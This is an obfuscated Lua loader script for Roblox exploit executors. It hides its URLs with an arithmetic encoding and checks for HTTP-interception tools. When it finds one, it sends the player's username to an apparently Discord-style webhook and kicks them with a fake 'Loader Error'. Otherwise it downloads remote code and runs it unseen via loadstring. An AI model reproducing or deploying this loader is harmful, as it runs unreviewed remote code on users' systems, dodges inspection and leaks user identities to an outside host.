local function _D(d)
    local r = ""
    for i = 1, #d do r = r .. string.char(d[i] - i - 15) end
    return r
end

local _A = _D({120, 133, 134, 131, 135, 79, 69, 70, 124, 130, 141, 126, 139, 143, 130, 77, 131, 144, 143, 82, 133, 149, 143, 86, 159, 142, 140, 147, 155, 156, 153, 162, 95, 98, 103, 100, 108, 104, 105, 107, 104, 108, 111, 115, 116, 117, 111, 119, 113, 115, 121, 116, 115, 184, 119, 171, 121, 129, 139, 193, 193, 127, 147, 188, 167, 193, 204, 167, 198, 169, 134, 193, 166, 162, 194, 197, 176, 147, 195, 144, 170, 150, 153, 188, 188, 156, 150, 182, 192, 177, 183, 193, 228, 229, 209, 232, 229, 196, 197, 234, 170, 193, 172, 229, 234, 187, 187, 229, 243, 211, 241, 239, 231, 226, 175, 207, 187, 216, 222, 210, 215})
local _G = _D({120, 133, 134, 131, 135, 79, 69, 70, 138, 122, 145, 73, 131, 134, 146, 135, 149, 131, 151, 150, 137, 151, 137, 150, 150, 157, 143, 153, 160, 91, 145, 158, 157, 96, 155, 167, 167, 154, 151, 170, 177, 171, 170, 162, 107, 175, 174, 166, 167, 112, 180, 168, 170, 184, 117, 175, 173, 170, 174, 190, 123, 186, 175, 184, 190, 128, 196, 195, 187})

local _L = game:GetService("Players").LocalPlayer
local _req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request

local function _SC()
    if not _req then return false end
    local ok, info = pcall(debug.getinfo, _req)
    if ok and info and info.source ~= "=[C]" then return true end
    for _, v in ipairs({"HttpSpy", "SimpleSpy", "VGG Spy"}) do if getgenv()[v] then return true end end
    return false
end

if _SC() then
    pcall(function()
        _req({
            Url = _A,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = game:GetService("HttpService"):JSONEncode({
                embeds = {{
                    title = "🚨 Security Alert: Interceptor Detected",
                    description = "User " .. _L.Name .. " tried to use HTTP Spy.",
                    color = 16711680
                }}
            })
        })
    end)
    _L:Kick("Loader Error 0xF2")
    return
end

getgenv()._NK_SIGNAL = "NAZARKUS_V6_AUTH"
local s, c = pcall(function() return game:HttpGet(_G) end)
if s and c then
    local f = loadstring(c)
    if f then pcall(f) end
else
    _L:Kick("Connection Fail. Check your internet.")
end
